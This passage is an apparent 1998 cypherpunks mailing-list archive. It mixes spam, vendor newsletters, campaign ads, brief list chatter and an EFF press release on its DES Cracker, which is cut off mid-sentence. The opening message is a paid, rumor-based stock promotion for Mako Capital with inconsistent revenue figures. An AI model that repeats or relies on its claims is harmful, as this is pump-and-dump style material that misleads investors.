Hundreds of valuable prizes will be awarded to the winners of our exciting drawing.

And one lucky winner will receive a 10-day Hawaiian vacation for two!
It costs nothing to enter. 

To enter, simply become a preferred e-mail subscriber to our FREE  
financial information newsletter. A new winner will be selected everyday! 
There is absolutely no cost to you. 

Receive a FREE 12-month subscription to this informative financial 
information newsletter. You'll receive breaking news on all companies 
currently profiled as well as all future profiles as soon as they are released. 
The last company profiled was up 92% in one week! 

You must be at least 18 years old to enter.


Mako Capital (Mako) .74 trades on the OTC bulletin board. 
The stock is deeply discounted and on sale at current share prices. There
is reason to believe that the merger with sports group international
will be completed the week of December 7th. If this information is 
accurate, Mako stock could see significantly higher prices in the near
term. In addition, their are rumors that additional orders for their
Spalding Sports Drink should bring the total number of cases pre-sold
for 1999 up to approximately 2 million cases. That translates into 
approximately 25 million in revenue for 99. The stock could easily trade
back to 2.25 or higher based on that kind of revenue. 

To enter the drawing go to
http://www.eopop.com/dd/guest_book.htm


MAKO Capital (MAKO) .74 and traded on the OTC Bulletin Board.

The stock is deeply discounted and on-sale at current share prices.

We have reason to believe that the merger with Sports Group International
will be completed by the first week of December.  If that is true, we look
for significantly higher prices in the near term.  Also, we hear rumors of
additional orders for their Spalding Sports Drinks to bring them up to 2
million  pre-sold for '99.  That would be over $28 million dollars in
revenue.

We could easily see the stock trade back to 2.25.

Please fill out the form to receive a 12-month free subscription to
our financial information newsletter absolutely free.

Go to http://www.eopop.com/dd/guest_book.htm


Mako Capital has paid Freedom Rock Partners 150,000 shares of free trading
stock, and options to purchase 100,000 shares of Mako Capital at $1.00 as a
fee to prepare this report.

For more information, please read our disclaimer.
http://www.eopop.com/dd/disclaimer.htm 





NOTE: 
For those on the internet who do not want to recieve exciting messages 
such as this.....to be removed from our mailing list and our affilate lists 
goto:   edd@spdy.com and type remove.

*We strive to comply with all state and federal laws and to send ads only to interested parties.

*This ad is not intended for nor do we knowingly send to Washington State residents. 

* Responding to the "return address" will NOT have your name removed. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RealNetworks News <announce@dmail1.real-net.net>
Date: Thu, 16 Jul 1998 08:44:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FREE! Brilliant Audio With New RealPlayer G2
Message-ID: <199807161544.IAA27433@dmail3.real-net.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear RealPlayer User,

I'm very excited to announce the beta release of
RealPlayer G2 and RealPlayer Plus G2, available 
for download now.

With RealPlayer G2 you'll get a quantum leap in 
RealAudio and RealVideo quality, including an 80% 
improvement in RealAudio's frequency response and 
smoother, sharper RealVideo.

RealPlayer G2 technology dramatically reduces 
rebuffering, which means less break-up in RealAudio
and RealVideo streams.  With this new feature you'll
notice increased performance over your modem -- even
under poor network conditions.

RealPlayer G2 allows you to reach a universe of
programming directly through your player.  With the 
touch of a button through RealChannels you can access
great channels like CNN, Screening Room (movie 
previews), ABC, NPR, Comedy Central, and more.

To download now, visit:

--> http://www.real.com/50/rg26a.html

We are also releasing a new version of the premium 
RealPlayer, RealPlayer Plus G2.  With RealPlayer Plus
G2 you'll receive:

*  Even better RealAudio and RealVideo quality
*  Hi-fi audio display with spectrum analyzer
*  10 channel graphic equalizer for tuning treble, bass,
   and mid-range
*  Video controls which work just like your TV set --
   you control brightness, contrast, and saturation

All of this with a 30-day money back guarantee -- just
$29.99.  To download now, visit:

--> http://www.real.com/50/plusg26a.html

+===+===+===+===+===+===+===+===+===+===+===+===+===+
"RealPlayer G2 from RealNetworks is the next generation
of streaming media players. End users can now experience
high quality audio and video..." - ZDNet, 5/1998

"Overall, RealPlayer is a class-act, this is one 
application you'll definitely want to have for your online
daily web surfing..." - Strouds Review, 5/1998

84% of our users say RealPlayer G2 sounds better.  86% 
say the new RealPlayer G2 interface is better.  They also
use RealPlayer G2 to stay informed everyday!  We hope 
you'll try for yourself -- and ENJOY!
+===+===+===+===+===+===+===+===+===+===+===+===+===+
Thank you for continuing to use RealNetworks products,

Maria Cantwell
Senior Vice President
RealNetworks, Inc.
Seattle, WA  USA

---------------------------------------------
 ABOUT THIS E-MAIL

 This e-mail was sent to users of RealPlayer
 software who indicated a preference during
 the download or installation process to receive
 notification of new RealNetworks products or
 services via e-mail.

 For information about subscribing to or
 unsubscribing from future announcements, visit
 http://www.real.com/mailinglist/index.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samson <nobody@samson.ml.org>
Date: Thu, 16 Jul 1998 08:07:12 -0700 (PDT)
To: Cyberdog <cypherpunks@toad.com
Subject: Re: Whitehouse Bastards want my name named.
Message-ID: <e4bce0a56adfb76b39be77080ef06bca@samson.ml.org>
MIME-Version: 1.0
Content-Type: text/plain




Cyberdog wrote:
> 
> Blumenthal Discovery requests both the Email subscriber list to
> Drudge Report AND contributor list to Drudge Legal Defense
> Fund...

mailto:help@nym.alias.net - don't subscribe without it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Thu, 16 Jul 1998 05:03:17 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: My wife shagged the pool team/Swedish hooker sues clients
Message-ID: <19980716110827.14015.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

Click for STUFFED: Thursday July 16 1998


<img src=http://stuffed.net/98/7/16/cover.gif width=300
height=380 border=0 alt='Click here for STUFFED, the new daily
 tabloid news, humor and babes newspaper from Eureka!'>

This is a combined text/html email. If your email client can
display html web pages  you probably won't see this text but
should see the front cover of today's issue above, which you
should  click on to read.  If you cannot see the cover, your
email client either cannot display html or its' options have
been set to  ignore html images.  In which case,  please ...
Click here to read today's! --> http://stuffed.net/98/7/16/

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Graham-John Bullers" <real@freenet.edmonton.ab.ca>
Date: Thu, 16 Jul 1998 10:16:27 -0700 (PDT)
To: announce@dmail1.real-net.net>
Subject: Re: FREE! Brilliant Audio With New RealPlayer G2
In-Reply-To: <199807161544.IAA27433@dmail3.real-net.net>
Message-ID: <199807161715.LAA14028@freenet.edmonton.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain


Date sent:      	Thu, 16 Jul 1998 08:44:35 -0700
To:             	cypherpunks@toad.com
Subject:        	FREE! Brilliant Audio With New RealPlayer G2
From:           	RealNetworks News <announce@dmail1.real-net.net>
Send reply to:  	RealNetworks News <announce@dmail1.real-net.net>

> Dear RealPlayer User,
> 
> I'm very excited to announce the beta release of
> RealPlayer G2 and RealPlayer Plus G2, available 
> for download now.
> 
> With RealPlayer G2 you'll get a quantum leap in 
> RealAudio and RealVideo quality, including an 80% 
> improvement in RealAudio's frequency response and 
> smoother, sharper RealVideo.
> 
> RealPlayer G2 technology dramatically reduces 
> rebuffering, which means less break-up in RealAudio
> and RealVideo streams.  With this new feature you'll
> notice increased performance over your modem -- even
> under poor network conditions.
> 
> RealPlayer G2 allows you to reach a universe of
> programming directly through your player.  With the 
> touch of a button through RealChannels you can access
> great channels like CNN, Screening Room (movie 
> previews), ABC, NPR, Comedy Central, and more.
> 
> To download now, visit:
> 
> --> http://www.real.com/50/rg26a.html
> 
> We are also releasing a new version of the premium 
> RealPlayer, RealPlayer Plus G2.  With RealPlayer Plus
> G2 you'll receive:
> 
> *  Even better RealAudio and RealVideo quality
> *  Hi-fi audio display with spectrum analyzer
> *  10 channel graphic equalizer for tuning treble, bass,
>    and mid-range
> *  Video controls which work just like your TV set --
>    you control brightness, contrast, and saturation
> 
> All of this with a 30-day money back guarantee -- just
> $29.99.  To download now, visit:
> 
> --> http://www.real.com/50/plusg26a.html
> 
> +===+===+===+===+===+===+===+===+===+===+===+===+===+
> "RealPlayer G2 from RealNetworks is the next generation
> of streaming media players. End users can now experience
> high quality audio and video..." - ZDNet, 5/1998
> 
> "Overall, RealPlayer is a class-act, this is one 
> application you'll definitely want to have for your online
> daily web surfing..." - Strouds Review, 5/1998
> 
> 84% of our users say RealPlayer G2 sounds better.  86% 
> say the new RealPlayer G2 interface is better.  They also
> use RealPlayer G2 to stay informed everyday!  We hope 
> you'll try for yourself -- and ENJOY!
> +===+===+===+===+===+===+===+===+===+===+===+===+===+
> Thank you for continuing to use RealNetworks products,
> 
> Maria Cantwell
> Senior Vice President
> RealNetworks, Inc.
> Seattle, WA  USA
> 
> ---------------------------------------------
>  ABOUT THIS E-MAIL
> 
>  This e-mail was sent to users of RealPlayer
>  software who indicated a preference during
>  the download or installation process to receive
>  notification of new RealNetworks products or
>  services via e-mail.
> 
>  For information about subscribing to or
>  unsubscribing from future announcements, visit
>  http://www.real.com/mailinglist/index.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Wed, 15 Jul 1998 20:14:47 -0700 (PDT)
To: Linda Reed--PCC West Campus CSC <cypherpunks@toad.com
Subject: Re: BumGirl - SPACE ALIENS HIDE MY DRUGS!!!
In-Reply-To: <009C92EF.5F68B900.7@west.cscwc.pima.edu>
Message-ID: <3.0.5.32.19980716120515.00902370@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


Didn't this start out as

SPACE ALIENS ATE MY DRUGS!

Reeza!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Support Online Staff" <SupportOnlineStaff_000988@news.newswire.microsoft.com>
Date: Thu, 16 Jul 1998 13:21:25 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Windows and Internet Explorer Support News Watch - July 13, 1998
Message-ID: <199807162021.NAA27346@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Windows and Internet Explorer Support News Watch
================================================

As a subscriber to the Windows and Internet Explorer Support News Watch, you receive e-mail twice each month that highlights some of the new articles recently published on Support Online, Microsoft's award-winning technical support web site. The following are new Support Online articles that answer frequently asked questions about using Windows and Internet Explorer:

Contents
--------

 - Microsoft Windows 98
 - Microsoft Internet Explorer 4.0 for Windows 95 and Windows NT 4.0
 - Microsoft Windows CE

Microsoft Windows 98
--------------------

Troubleshooting Windows 98 Startup Problems and Error Messages (Q188867)
http://support.microsoft.com/support/kb/articles/q188/8/67.asp

Cannot Connect to America Online or Install America Online 4.0 (Q188654)
http://support.microsoft.com/support/kb/articles/q188/6/54.asp

Err Msg: There Is No WinModem Found in Your Computer, But... (Q188601)
http://support.microsoft.com/support/kb/articles/q188/6/01.asp

Err Msg: Not Enough Memory to Convert to FAT32. To Free Up... (Q188561)
http://support.microsoft.com/support/kb/articles/q188/5/61.asp

DVD Support in Windows 98 (Q188513)
http://support.microsoft.com/support/kb/articles/q188/5/13.asp

Error Message: Error 745: An Essential File Is Missing (Q174579)
http://support.microsoft.com/support/kb/articles/q174/5/79.asp

Error Message "Invalid System Disk" After Setup Reboots (Q128730)
http://support.microsoft.com/support/kb/articles/q128/7/30.asp

"Earlier Version of MSN Detected" Using Inbox Icon (Q189077)
http://support.microsoft.com/support/kb/articles/q189/0/77.asp

"Call to Undefined Dynalink" Message During Windows 98 Setup (Q188970)
http://support.microsoft.com/support/kb/articles/q188/9/70.asp

"Internal Error Occurred" Error Message Using Internet Explorer (Q188952)
http://support.microsoft.com/support/kb/articles/q188/9/52.asp

Error Message: Not Enough Memory to Load RamDrive (Q188886)
http://support.microsoft.com/support/kb/articles/q188/8/86.asp

Err Msg: This Software Does Not Support Windows 98 and... (Q188865)
http://support.microsoft.com/support/kb/articles/q188/8/65.asp

Err Msg: This Version of Windows Does Not Run on MS-DOS 7.0... (Q188795)
http://support.microsoft.com/support/kb/articles/q188/7/95.asp

Err Msg: There Is No WinModem Found in Your Computer, But... (Q188601)
http://support.microsoft.com/support/kb/articles/q188/6/01.asp

Err Msg: Windows Cannot Find Program.exe, Which Is Needed... (Q188592)
http://support.microsoft.com/support/kb/articles/q188/5/92.asp

Cannot Gain Access to Multiple CD-ROM Drives Using Startup Disk (Q188391)
http://support.microsoft.com/support/kb/articles/q188/3/91.asp

Err Msg: The Microsoft Dial-Up Adapter Is in Use or Not... (Q188141)
http://support.microsoft.com/support/kb/articles/q188/1/41.asp

Minimum Hardware Requirements for Windows 98 Installation (Q182751)
http://support.microsoft.com/support/kb/articles/q182/7/51.asp



Microsoft Internet Explorer 4.0 for Windows 95 and Windows NT 4.0
-----------------------------------------------------------------

Err Msg: Internet Explorer Cannot Open the Site <Web Address>... (Q189057)
http://support.microsoft.com/support/kb/articles/q189/0/57.asp

Internet Explorer Issues Extra Challenge with NTLM (Q189033)
http://support.microsoft.com/support/kb/articles/q189/0/33.asp

Check Boxes and Option Buttons on Web Page Are Not Printed (Q188988)
http://support.microsoft.com/support/kb/articles/q188/9/88.asp

Err Msg: Internet Explorer Cannot Open the Internet Site... (Q188839)
http://support.microsoft.com/support/kb/articles/q188/8/39.asp

Problems with Internet Explorer and the Safe Passage Program (Q188706)
http://support.microsoft.com/support/kb/articles/q188/7/06.asp


Microsoft Windows CE
--------------------

WinCE: Cannot Connect Handheld PC Using Dial-Up Networking (Q189122)
http://support.microsoft.com/support/kb/articles/q189/1/22.asp

WinCE 2.0: Terminal Connection Settings Spontaneously Change (Q189097)
http://support.microsoft.com/support/kb/articles/q189/0/97.asp

WinCE: Infrared Connection Disconnects During Synchronization (Q189058)
http://support.microsoft.com/support/kb/articles/q189/0/58.asp

WinCE: System Tool in Control Panel Lists Only One PC Card (Q188980)
http://support.microsoft.com/support/kb/articles/q188/9/80.asp

WinCE: Remote Networking Connection Preferences Are Not Saved (Q188894)
http://support.microsoft.com/support/kb/articles/q188/8/94.asp

Summary of Known Issues in Pocket Word on a Handheld PC (Q188782)
http://support.microsoft.com/support/kb/articles/q188/7/82.asp

Summary of Issues in Note Taker on a Palm-Size PC (Q188505)
http://support.microsoft.com/support/kb/articles/q188/5/05.asp

InstallShield Hangs When You Install Windows CE Services (Q188485)
http://support.microsoft.com/support/kb/articles/q188/4/85.asp



Get Support Online Articles by E-mail
-------------------------------------

You can also receive these articles (and others) in e-mail by sending a message to mshelp@microsoft.com. In the Subject line of your message, enter the Article-ID number (Qnnnnnn). For example to receive Q162721, your Subject line should resemble the following example:

   Subject: Q162721

You can have multiple articles sent to you in e-mail by typing multiple Article-ID numbers separated by a comma. For example:

   Subject: Q178049, Q174914, Q174062

To receive an index of articles, enter "Index" (without quotation marks) in the Subject line. For example: 

   Subject: Index

The MSHelp Index is updated monthly. For more information about MSHelp, see http://support.microsoft.com/support/kb/articles/q183/1/21.asp.

Visit Support Online
--------------------

We also encourage you to visit Support Online at http://support.microsoft.com/support/ to see our complete selection of helpful articles designed to answer questions about using Microsoft products.

New Features Make Finding Your Answers on Support Online Even Easier
====================================================================

Support Online recently released a number of new features to make it even easier to find the answers you need. The following highlights some of the enhancements you'll see on Support Online at http://support.microsoft.com/. For information about how to use these new Support Online features, see http://support.microsoft.com/support/howto/.

- Specify an article ID number. If you know the ID number of the 
  Knowledge Base article you want, you can enter the ID number 
  to find that specific article.

- Search for troubleshooting tools. Now you can customize your 
  search to include troubleshooting tools only.

- Search for specific drivers and other downloadable files. If you
  know the name of the driver or download file you want, enter the
  full file name to find the file on Support Online. 

- See what's new. If you want to see the latest information about 
  a product and/or a topic, use the What's New option and select 
  the number of days you want to review. You can select 1, 3, 7, 
  14, or 30 days.  

- Toggle between Advanced View and Basic View. Advanced View 
  offers additional search options and other features. Now you 
  can easily toggle between Advanced View and Basic View.

Need help using these features? See http://support.microsoft.com/support/howto/.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft-sponsored events:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For information on all Microsoft-sponsored events, please visit:
http://www.microsoft.com/events/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How to use this mailing list:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You received this e-mail newsletter as a result of your registration on the Microsoft.com Personal Information Center. You may unsubscribe from this e-mail newsletter, or subscribe to a variety of other informative e-mail newsletters, by returning to the Personal Information Center at
http://register.microsoft.com/regwiz/personalinfo.asp
and changing your subscription preferences.

Alternatively, please send a reply to this e-mail with the word "unsubscribe" as the first line in the body of the message.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THIS DOCUMENT IS PROVIDED FOR INFORMATIONAL PURPOSES ONLY.  The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication.  Because Microsoft must respond to change in market conditions, it should not be interpreted to be a commitment on the part of Microsoft and Microsoft cannot guarantee the accuracy of any information presented after the date of publication.
INFORMATION PROVIDED IN THIS DOCUMENT IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND FREEDOM FROM INFRINGEMENT.
The user assumes the entire risk as to the accuracy and the use of this document. This  document may be copied and distributed subject to the following conditions:
1.   All text must be copied without modification and all pages must be included
2.   All copies must contain Microsoft's copyright notice and any other notices provided therein
3.   This document may not be distributed for profit




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Thu, 16 Jul 1998 10:38:56 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 16, 1998
Message-ID: <199807161726.MAA04271@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




<FONT COLOR="#000000"
SIZE=2>=============================================
Welcome to today's edition of the CTIA Daily
News
from WOW-COM.  Please click on the icon /
attachment
for the most important news in wireless
communications today.

WIRELESS IT '98, The Next Generation in
Personal
Computing & Communications October
12-14,
Las Vegas, Nevada Call (202) 785-0081 for more
information!
<FONT COLOR="#000000"
SIZE=2>=============================================<FONT
COLOR="#000000">
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 16 Jul 1998 13:47:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Senate Talks Crypto Law
Message-ID: <199807162047.QAA20692@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Greg Garcia, ACP:

"Congress Needs to Act on Encryption Legislation,"
In July 15 Congressional Record.

An encryption colloquy among Senators Lott, Leahy, Craig,
Burns, Ashcroft, Abraham, and Shelby:

   http://jya.com/cr071598.htm

Private doorbell is gummed.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abcdefg@mindspring.com
Date: Thu, 16 Jul 1998 14:01:37 -0700 (PDT)
Subject: Steve Langford for Governor
Message-ID: <eaep.3.0.reg.ChaMP2.35992.7047601852@mail.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



FOUR REASONS TO VOTE FOR STEVE LANGFORD
HE IS PRO-BUSINESS

Steve Langford is the only candidate for Governor who has paid the bills of a business and passed 
bills in the General Assembly.  Langford Construction, his family business, was awarded the Family 
Business of the Year Award for 1995 by the Michael J. Coles School of Business at Kennesaw State 
University.  Steve Langford was given a score of 92% by the National Federation of Independent 
Business (the only other Democratic candidate for Governor in the General Assembly got 67%).

HE IS PRO-CHOICE
Steve Langford opposes any government interference in your right to make decisions about 
reproductive health--and he has the voting record to prove it:
-  Voted against state-mandated lectures and forced waiting periods.
-  Voted against--and took the Senate well to speak against--Senate Bill 357, which would have 
banned certain abortion procedures. The Ohio version of this bill was recently ruled unconstitutional 
by the U.S. Supreme Court.

HE IS PRO-ENVIRONMENT
Steve Langford's Senate Bill 500 is the bill that made the City of Atlanta pay fines for polluting the 
Chattahoochee--and finally got the city moving toward a solution to the persistent problems of 
Atlanta's water and sewer systems. Why does it matter?  Each time it rains more than 1/10 inch, 
Atlanta sewers overflow into the Chattahoochee.  Of course, if you live downstream of Atlanta, you 
already knew that.

HE IS PRO-TAXPAYER
Steve Langford introduced a bill in the 1998 General Assembly that would give you a rebate when 
the state has a surplus (if you owed $1,000 in Georgia income taxes last year, you would have 
gotten a $100 rebate on your taxes).  No surplus?  No rebate.  Makes sense, doesn't it?

LIKE WHAT YOU SEE?  INTERESTED IN LEARNING MORE?  
VISIT STEVE LANGFORD'S WEBSITE AT www.steve-langford.org

GOT SOMETHING TO SAY?  E-MAIL STEVE LANGFORD AT stevelangford@mindspring.com

THOSE YET TO ENTER THE COMPUTER AGE CAN CALL STEVE LANGFORD AT (770)984-
1998, OR WRITE HIM AT: 
FRIENDS OF STEVE LANGFORD
1955 LOWER ROSWELL ROAD, SUITE A
MARIETTA, GA 30068





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abcdefg@mindspring.com
Date: Thu, 16 Jul 1998 14:22:14 -0700 (PDT)
Subject: Steve Langford for Governor
Message-ID: <eaep.3.0.reg.ChaMP2.35992.7191100694@mail.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



FOUR REASONS TO VOTE FOR STEVE LANGFORD
HE IS PRO-BUSINESS

Steve Langford is the only candidate for Governor who has paid the bills of a business and passed 
bills in the General Assembly.  Langford Construction, his family business, was awarded the Family 
Business of the Year Award for 1995 by the Michael J. Coles School of Business at Kennesaw State 
University.  Steve Langford was given a score of 92% by the National Federation of Independent 
Business (the only other Democratic candidate for Governor in the General Assembly got 67%).

HE IS PRO-CHOICE
Steve Langford opposes any government interference in your right to make decisions about 
reproductive health--and he has the voting record to prove it:
-  Voted against state-mandated lectures and forced waiting periods.
-  Voted against--and took the Senate well to speak against--Senate Bill 357, which would have 
banned certain abortion procedures. The Ohio version of this bill was recently ruled unconstitutional 
by the U.S. Supreme Court.

HE IS PRO-ENVIRONMENT
Steve Langford's Senate Bill 500 is the bill that made the City of Atlanta pay fines for polluting the 
Chattahoochee--and finally got the city moving toward a solution to the persistent problems of 
Atlanta's water and sewer systems. Why does it matter?  Each time it rains more than 1/10 inch, 
Atlanta sewers overflow into the Chattahoochee.  Of course, if you live downstream of Atlanta, you 
already knew that.

HE IS PRO-TAXPAYER
Steve Langford introduced a bill in the 1998 General Assembly that would give you a rebate when 
the state has a surplus (if you owed $1,000 in Georgia income taxes last year, you would have 
gotten a $100 rebate on your taxes).  No surplus?  No rebate.  Makes sense, doesn't it?

LIKE WHAT YOU SEE?  INTERESTED IN LEARNING MORE?  
VISIT STEVE LANGFORD'S WEBSITE AT www.steve-langford.org

GOT SOMETHING TO SAY?  E-MAIL STEVE LANGFORD AT stevelangford@mindspring.com

THOSE YET TO ENTER THE COMPUTER AGE CAN CALL STEVE LANGFORD AT (770)984-
1998, OR WRITE HIM AT: 
FRIENDS OF STEVE LANGFORD
1955 LOWER ROSWELL ROAD, SUITE A
MARIETTA, GA 30068





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nicolas Robidoux <N.Robidoux@massey.ac.nz>
Date: Thu, 16 Jul 1998 00:50:02 -0700 (PDT)
To: jf_avon@citenet.net
Subject: Re: [humor]
In-Reply-To: <199807160338.XAA02713@cti06.citenet.net>
Message-ID: <9807160740.AA28593@ma-kaka.massey.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



Nicolas' homebrewed quip (vive Linux!):

I really like the Natural Keyboard, but I would never trust a keyboard
manufacturer to put together an operating system.

nicolas




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Stephenson <kevin.stephenson@pobox.com>
Date: Thu, 16 Jul 1998 23:30:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: NYT Crypto OpEd
In-Reply-To: <199807152141.RAA24473@camel7.mindspring.com>
Message-ID: <199807170630.XAA13442@mail2.deltanet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


 At 05:36 PM 7/15/98 -0400, you wrote: &gt;The NYT has a fairly good OpEd
on encryption today, &gt;written by a novelist, who makes a good case for
&gt;the citizen's need for the privacy protection, now that &gt;there are a
zillion ways computers pry into private &gt;affairs. &gt; &gt;=A0=A0
http://www.nytimes.com &gt; &gt;For those outside the US: NYT today began
its free  &gt;worldwide online service, so the whole world can log  &gt;on
to its prying computers. (Non-USes heretofore  &gt;had to pay for privacy
loss.) It claims to have 4 million  &gt;daily online consumers and is happy
to run an advertiser  &gt;drivern operation to suck in millions more around
the  &gt;planet. &gt; &gt;Take note, Slate. &gt;   How many smaller sites
will be able to break even with advertising subsidies, let alone make a
profit? Advertisers are going to head to the big sites and you'll see a
media concentration on the Internet just like TV and print, unless small
sites can find a creative way to charge for content.  If people aren't
willing to pay for on-line New York Times, they sure  as hell aren't going
to pay much if anything for Mom and Pop's Independent Media/Content. If
they were willing to pay, they probably wouldn't want to use an unfamiliar
and exotic technology like digital cash and they don't want to ring up
$1.00 charges on their Visa for the smaller bits of content wanted from
these other providers.  How about consolidated third-party content billing,
with monthly payment to the billing company by any form (check, cash,
digital cash, credit card, gold coins)? Full anonimity available when
paying with cash or the like.  Give the consumer easy credit and they will
come.
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.2

iQA/AwUBNa7vh3boo5vy7gslEQIdrgCgt4pceZMvqLApbKHt/y/yhDZeTY4AoMQe
+6rV1sFP4mGmJXNd/lNa3WTR
=fc8V
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 16 Jul 1998 14:48:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: DES-II-2 contest finished already!
In-Reply-To: <199807161906.VAA05449@basement.replay.com>
Message-ID: <199807162149.XAA27444@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Will RSA pay if the DES-gilmo was used? Or was 
RSA playacting john?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 17 Jul 1998 00:16:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: "EFF DES Cracker" machine brings honesty to crypto debate
Message-ID: <199807170716.AAA04031@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


FOR IMMEDIATE RELEASE
July 17, 1998

CONTACTS:
   Alexander Fowler, +1 202 462 5826, afowler@eff.org
   Barry Steinhardt, +1 415 436 9333 ext. 102, barrys@eff.org
   John Gilmore, +1 415 221 6524, gnu@toad.com

  "EFF DES CRACKER" MACHINE BRINGS HONESTY TO CRYPTO DEBATE

 ELECTRONIC FRONTIER FOUNDATION PROVES THAT DES IS NOT SECURE

SAN FRANCISCO, CA -- The Electronic Frontier Foundation (EFF) today
raised the level of honesty in crypto politics by revealing that the
Data Encryption Standard (DES) is insecure.  The U.S. government has
long pressed industry to limit encryption to DES (and even weaker
forms), without revealing how easy it is to crack.  Continued adherence
to this policy would put critical infrastructures at risk; society
should choose a different course.

To prove the insecurity of DES, EFF built the first unclassified
hardware for cracking messages encoded with it.  On Wednesday of this
week the EFF DES Cracker, which was built for less than $250,000,
easily won RSA Laboratory's "DES Challenge II" contest and a $10,000
cash prize.  It took the machine less than 3 days to complete the
challenge, shattering the previous record of 39 days set by a massive
network of tens of thousands of computers.  The research results are
fully documented in a book published this week by EFF and O'Reilly and
Associates, entitled "Cracking DES: Secrets of Encryption Research,
Wiretap Politics, and Chip Design."

"Producing a workable policy for encryption has proven a very hard
political challenge.  We believe that it will only be possible to
craft good policies if all the players are honest with one another and
the public," said John Gilmore, EFF co-founder and project leader.  "When
the government won't reveal relevant facts, the private sector must
independently conduct the research and publish the results so that we
can all see the social trade-offs involved in policy choices."

The nonprofit foundation designed and built the EFF DES Cracker to
counter the claim made by U.S. government officials that governments
cannot decrypt information when protected by DES, or that it would
take multimillion-dollar networks of computers months to decrypt one
message.  "The government has used that claim to justify policies of
weak encryption and 'key recovery,' which erode privacy and security
in the digital age," said EFF Executive Director Barry Steinhardt.  It
is now time for an honest and fully informed debate, which we believe
will lead to a reversal of these policies."

"EFF has proved what has been argued by scientists for twenty years,
that DES can be cracked quickly and inexpensively," said Gilmore.
"Now that the public knows, it will not be fooled into buying products
that promise real privacy but only deliver DES.  This will prevent
manufacturers from buckling under government pressure to 'dumb down'
their products, since such products will no longer sell."  Steinhardt
added, "If a small nonprofit can crack DES, your competitors can too.
Five years from now some teenager may well build a DES Cracker as her
high school science fair project."

The Data Encryption Standard, adopted as a federal standard in 1977 to
protect unclassified communications and data, was designed by IBM and
modified by the National Security Agency.  It uses 56-bit keys,
meaning a user must employ precisely the right combination of 56 1s
and 0s to decode information correctly.  DES accounted for more than
$125 million annually in software and hardware sales, according to a
1993 article in "Federal Computer Week."  Trusted Information Systems
reported last December that DES can be found in 281 foreign and 466
domestic encryption products, which accounts for between a third and
half of the market.

A DES cracker is a machine that can read information encrypted with
DES by finding the key that was used to encrypt that data.  DES
crackers have been researched by scientists and speculated about in
the popular literature on cryptography since the 1970s.  The design
of the EFF DES Cracker consists of an ordinary personal computer
connected to a large array of custom chips.  It took EFF less than
one year to build and cost less than $250,000.

This week marks the first public test of the EFF DES Cracker, which
won the latest DES-cracking speed competition sponsored by RSA
Laboratories (http://www.rsa.com/rsalabs/).  Two previous RSA
challenges proved that massive collections of computers coordinated
over the Internet could successfully crack DES.  Beginning Monday
morning, the EFF DES Cracker began searching for the correct answer to
this latest challenge, the RSA DES Challenge II-2.  In less than 3
days of searching, the EFF DES Cracker found the correct key.  "We
searched more than 88 billion keys every second, for 56 hours, before
we found the right 56-bit key to decrypt the answer to the RSA
challenge, which was 'It's time for those 128-, 192-, and 256-bit
keys,'" said Gilmore.

Many of the world's top cryptographers agree that the EFF DES Cracker
